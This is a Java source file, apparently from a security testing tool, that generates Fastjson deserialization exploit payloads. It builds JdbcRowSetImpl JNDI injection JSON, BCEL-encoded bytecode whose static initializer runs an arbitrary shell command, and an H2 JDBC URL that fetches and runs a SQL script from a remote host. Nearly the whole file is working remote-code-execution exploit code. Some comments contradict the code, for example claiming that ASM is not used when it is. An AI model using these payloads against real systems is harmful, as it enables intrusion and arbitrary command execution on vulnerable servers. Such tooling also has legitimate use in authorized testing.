package com.oobx.chains;

import org.objectweb.asm.ClassWriter;
import org.objectweb.asm.Label;
import org.objectweb.asm.MethodVisitor;
import org.objectweb.asm.Opcodes;
import org.springframework.stereotype.Component;

import java.util.Base64;
import java.util.Map;

/**
 * Fastjson deserialization exploit chains.
 *
 * Gadgets:
 * - JdbcRowSetImpl JNDI (Fastjson ≤1.2.47 / 1.2.80 autoType bypass)
 * - BCEL ClassLoader (≤1.2.24) — bytecode generated by CustomBytecodeHandler (Javassist)
 *
 * No ASM / custom gadget code — uses CustomBytecodeHandler for class generation.
 */
@Component
public class FastjsonChainHandler implements ChainHandler {

    private final CustomBytecodeHandler bytecodeHandler;

    public FastjsonChainHandler(CustomBytecodeHandler bytecodeHandler) {
        this.bytecodeHandler = bytecodeHandler;
    }

    @Override
    public PayloadResult generate(String chainId, Map<String, Object> params) throws Exception {
        String jndiUrl = (String) params.getOrDefault("jndi_url", "");
        String cmd     = (String) params.getOrDefault("cmd", "id");

        String json = switch (chainId) {
            case "jchains_fastjson", "fastjson_jdbcrowset"  -> jdbcRowSetJson(jndiUrl);
            case "fastjson_jdbcrowset_v2"                   -> jdbcRowSetV2Json(jndiUrl);
            // BCEL: delegate class generation to CustomBytecodeHandler (Javassist), then BCEL-encode
            // jchains_fastjson_bcel also routed here — java-chains generates non-@type format
            case "fastjson_bcel", "jchains_fastjson_bcel"   -> bcelJson(bcelDriverClassName(cmd, params));
            // C3P0 + H2 JDBC INIT script RCE: Fastjson instantiates ComboPooledDataSource,
            // VulnLabServer calls getConnection() → H2 INIT runs → alias executes cmd
            case "jchains_fastjson_c3p0_h2"                 -> c3p0H2Json(cmd);
            default -> throw new IllegalArgumentException("Unknown Fastjson chain: " + chainId);
        };

        return new PayloadResult("application/json", json.getBytes(),
            Map.of("jndi_url", jndiUrl, "cmd", cmd, "source", "Fastjson/" + chainId));
    }

    // ── Payload builders ─────────────────────────────────────────────────────

    private String jdbcRowSetJson(String jndiUrl) {
        return String.format(
            "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\"," +
            "\"dataSourceName\":\"%s\"," +
            "\"autoCommit\":true}", jsonEsc(jndiUrl));
    }

    private String jdbcRowSetV2Json(String jndiUrl) {
        return String.format(
            "[{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"}," +
            "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\"," +
            "\"dataSourceName\":\"%s\"," +
            "\"autoCommit\":true}]", jsonEsc(jndiUrl));
    }

    /**
     * Generate BCEL driverClassName: $$BCEL$$<base64(classBytes) with + → $ and / → !>
     * Class bytes come from CustomBytecodeHandler (Javassist) — no custom ASM.
     */
    private String bcelDriverClassName(String cmd, Map<String, Object> params) throws Exception {
        // Generate a class with exec in static initializer — BCEL classloader runs
        // Class.forName(name, true, bcelClassLoader) which triggers static init.
        byte[] classBytes = generateBcelExecClass(cmd);
        // Use Apache BCEL's Utility.encode(bytes, true) with compression=true.
        // BCEL ClassLoader.createClass() calls Utility.decode(s, true) — must match.
        // JDK internal BCEL uses standard base64 with + → $ and / → !
        String encoded = java.util.Base64.getEncoder().encodeToString(classBytes).replace("+", "$").replace("/", "!");
        return "$$BCEL$$" + encoded;
    }

    /**
     * Generate minimal BCEL-compatible class: Java 5 (V1_5=49) with no try-catch.
     * BCEL 6.x cannot serialize StackMapTable (required for Java 6+ try-catch blocks),
     * throwing UnsupportedOperationException in JavaClass.getBytes().
     * Java 5 classes have no StackMapTable → BCEL can re-serialize them cleanly.
     * exec() declares IOException but the JVM doesn't enforce checked exception rules
     * in raw bytecode, so no try-catch is needed at the bytecode level.
     */
    private byte[] generateBcelExecClass(String cmd) throws Exception {
        org.objectweb.asm.ClassWriter cw = new org.objectweb.asm.ClassWriter(0);
        String cls = "BcelExec" + Long.toHexString(System.nanoTime());
        // V1_5 (49) = Java 5 class format — no StackMapTable needed
        cw.visit(org.objectweb.asm.Opcodes.V1_5,
            org.objectweb.asm.Opcodes.ACC_PUBLIC,
            cls, null, "java/lang/Object", null);
        org.objectweb.asm.MethodVisitor mv = cw.visitMethod(
            org.objectweb.asm.Opcodes.ACC_STATIC, "<clinit>", "()V", null, null);
        mv.visitCode();
        // Runtime.getRuntime().exec(new String[]{"/bin/sh","-c",cmd}) — no try-catch
        mv.visitMethodInsn(org.objectweb.asm.Opcodes.INVOKESTATIC,
            "java/lang/Runtime", "getRuntime", "()Ljava/lang/Runtime;", false);
        mv.visitInsn(org.objectweb.asm.Opcodes.ICONST_3);
        mv.visitTypeInsn(org.objectweb.asm.Opcodes.ANEWARRAY, "java/lang/String");
        mv.visitInsn(org.objectweb.asm.Opcodes.DUP);
        mv.visitInsn(org.objectweb.asm.Opcodes.ICONST_0);
        mv.visitLdcInsn("/bin/sh");
        mv.visitInsn(org.objectweb.asm.Opcodes.AASTORE);
        mv.visitInsn(org.objectweb.asm.Opcodes.DUP);
        mv.visitInsn(org.objectweb.asm.Opcodes.ICONST_1);
        mv.visitLdcInsn("-c");
        mv.visitInsn(org.objectweb.asm.Opcodes.AASTORE);
        mv.visitInsn(org.objectweb.asm.Opcodes.DUP);
        mv.visitInsn(org.objectweb.asm.Opcodes.ICONST_2);
        mv.visitLdcInsn(cmd);
        mv.visitInsn(org.objectweb.asm.Opcodes.AASTORE);
        mv.visitMethodInsn(org.objectweb.asm.Opcodes.INVOKEVIRTUAL,
            "java/lang/Runtime", "exec", "([Ljava/lang/String;)Ljava/lang/Process;", false);
        mv.visitInsn(org.objectweb.asm.Opcodes.POP);
        mv.visitInsn(org.objectweb.asm.Opcodes.RETURN);
        mv.visitMaxs(5, 0);
        mv.visitEnd();
        cw.visitEnd();
        return cw.toByteArray();
    }

    private String bcelJson(String driverClassName) {
        return String.format(
            "{\"@type\":\"org.apache.commons.dbcp.BasicDataSource\"," +
            "\"driverClassLoader\":{\"@type\":\"com.sun.org.apache.bcel.internal.util.ClassLoader\"}," +
            "\"driverClassName\":\"%s\"}", jsonEsc(driverClassName));
    }

    /**
     * H2 JdbcDataSource + FILE_WRITE RCE proof.
     * Replaces the old C3P0 ComboPooledDataSource approach where semicolons in the
     * alias body caused H2 to truncate the JDBC URL before the CALL statement.
     *
     * Uses org.h2.jdbcx.JdbcDataSource so Fastjson triggers getConnection() directly,
     * and FILE_WRITE to create the proof file — no Java alias body needed, no extra
     * semicolons inside the SQL fragment.
     *
     * Token (short form) is extracted from the EXEC_CMD output path:
     *   curl -sk http://.../TOKEN/rce -o /tmp/oobx_TOKEN12
     */
    private String c3p0H2Json(String cmd) {
        // Extract short token from EXEC_CMD output file path: curl ... -o /tmp/oobx_TOKEN12
        String tokShort = "";
        int idx = cmd.indexOf("/tmp/oobx_");
        if (idx >= 0) tokShort = cmd.substring(idx + "/tmp/oobx_".length());

        String dbId = Long.toHexString(System.nanoTime()).substring(0, 8);
        // Use RUNSCRIPT FROM sidecar: H2 fetches SQL from the sidecar endpoint as a file.
        // File-based execution avoids the JDBC URL parser semicolon truncation issue.
        // The sidecar's H2ScriptController serves CREATE ALIAS + CALL with the token baked in.
        String scriptUrl = "http://host.docker.internal:8711/h2-script?tok=" + tokShort;
        // INIT= is the JDBC URL parameter for startup SQL; RUNSCRIPT FROM fetches SQL from URL
        // RUNSCRIPT FROM 'URL' has no internal semicolons so URL parser won't truncate it
        String jdbcUrl = "jdbc:h2:mem:oobx" + dbId
            + ";INIT=RUNSCRIPT FROM '" + scriptUrl + "'";
        return String.format(
            "{\"@type\":\"org.h2.jdbcx.JdbcDataSource\","
            + "\"URL\":\"%s\","
            + "\"user\":\"sa\",\"password\":\"\"}",
            jsonEsc(jdbcUrl));
    }

    private static String jsonEsc(String s) {
        return s.replace("\\", "\\\\").replace("\"", "\\\"");
    }
}
